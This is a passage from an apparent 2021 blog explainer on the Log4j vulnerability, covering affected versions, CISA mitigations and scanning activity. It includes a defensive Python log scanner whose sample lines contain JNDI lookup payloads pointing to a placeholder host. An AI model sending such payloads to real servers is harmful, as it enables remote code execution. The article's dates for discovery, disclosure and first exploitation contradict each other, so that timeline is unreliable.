Log4j: Everything You Need to Know

12/16/2021

Security researchers have warned users that attackers are attempting to exploit a critical vulnerability in the Java logging library Apache Log4j. Log4j is a widely used Java library that logs error messages in enterprise software as well as in custom-built applications intended for in-house use.

The flaw, which was found to allow unauthenticated remote code execution and access to servers, was first discovered in Minecraft on December 9th, but experts are warning that cloud users may also be at risk. A wide variety of software is potentially vulnerable because Log4j is part of so many different kinds of enterprise and open-source software, ranging from email services to cloud platforms and web applications. The severity of this risk has been rated 10 out of 10 after exploits began on the 1st of December. The code, however, was first introduced into the codebase back in 2013 and has now been exploited since December 1st, nine days after public disclosure.

CISA’s Advisory And Evaluating Your Risk

The Apache Software Foundation addressed the issue, which affects versions 2.0beta9 to 2.14.1, with an update, 2.15.0-rc1. CISA has recommended that administrators and users either upgrade to the latest patch or apply the recommended mitigations to reduce the vulnerability. An organization that has been using the aforementioned versions of Log4j should examine its log files for signs of compromise. If you notice user-controlled strings such as “jndi:ldap”, you could be among those affected. To best mitigate the vulnerability, it is recommended that users set log4j2.formatMsgNoLookups to true by adding “-Dlog4j2.formatMsgNoLookups=True”. In addition to the recommended mitigations, the original CVE includes some vendor descriptions and tools that can be used to test your own systems against this vulnerability after patching to make sure you’re protected.
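One way to carry out the log review described above, as an added example (not code from this article, Apache or CISA): a Python scan that flags log lines carrying a JNDI lookup string, whether it appears in plain or percent-encoded form. The function names, the constructed sample log lines, and the generalization from “jndi:ldap” to any JNDI scheme are assumptions of this example.

```python
import re
from typing import NamedTuple
from urllib.parse import unquote

# "${jndi:<scheme>:" in any letter case; the article's "jndi:ldap" is one instance.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)

class Hit(NamedTuple):
    line_no: int
    scheme: str
    encoded: bool  # True if the marker only appeared after percent-decoding
    line: str

def percent_decode(text: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of percent-encoding (access logs keep URLs encoded)."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def scan(lines):
    """Return a Hit for every line that carries a JNDI lookup marker."""
    hits = []
    for line_no, line in enumerate(lines, start=1):
        raw = JNDI_LOOKUP.search(line)
        match = raw or JNDI_LOOKUP.search(percent_decode(line))
        if match:
            hits.append(Hit(line_no, match.group(1).lower(), raw is None, line.rstrip("\n")))
    return hits

# Constructed sample log lines (documentation IP ranges, example.invalid host).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Dec/2021:08:01:12 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:08:01:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '198.51.100.7 - - [10/Dec/2021:08:01:19 +0000] "GET /?q=%24%7BJNDI%3Aldap%3A%2F%2Fexample.invalid%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '2021-12-10 08:02:00 INFO Configured JNDI datasource jdbc/app',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        form = "percent-encoded" if hit.encoded else "plain"
        print(f"line {hit.line_no}: jndi:{hit.scheme} ({form}) -> {hit.line}")
```

A match shows that a lookup string reached the log, not that the lookup succeeded, and strings disguised by other means are outside what this scan covers.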

How Far The Exploitation Is Going

Researchers at Check Point have reported that attackers are making at least 100 attempts every minute to scan the internet for chances to exploit this Log4j vulnerability. Bugcrowd founder and CTO Casey Ellis said, “This is a worst-case
